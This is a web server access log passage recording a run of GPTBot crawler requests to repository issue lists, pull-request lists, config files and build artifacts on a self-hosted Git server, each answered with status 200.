"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=source" [Client 74.7.227.38] [Length 11365] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:37:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:37:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:19:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:19:37:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig?display=source" [Client 74.7.227.38] [Length 11822] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" -[17/Feb/2026:19:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11008] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:19:37:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:19:37:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:37:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:19:37:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/.vscode/c_cpp_properties.json" -[17/Feb/2026:19:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:37:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:37:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:19:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 60411] [Gzip 16.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/Analysis-00.toc" -[17/Feb/2026:19:37:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:19:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:37:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11288] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:37:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" -[17/Feb/2026:19:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:19:37:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 31637] [Gzip 13.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" -[17/Feb/2026:19:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:19:37:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10178] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:19:37:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12025] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12028] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12024] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json?display=source" [Client 74.7.227.38] [Length 12023] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/.vscode/tasks.json" -[17/Feb/2026:19:37:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 38854] [Gzip 14.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" -[17/Feb/2026:19:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -[17/Feb/2026:19:37:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11179] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" -[17/Feb/2026:19:37:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 71449] [Gzip 17.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" -[17/Feb/2026:19:37:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr 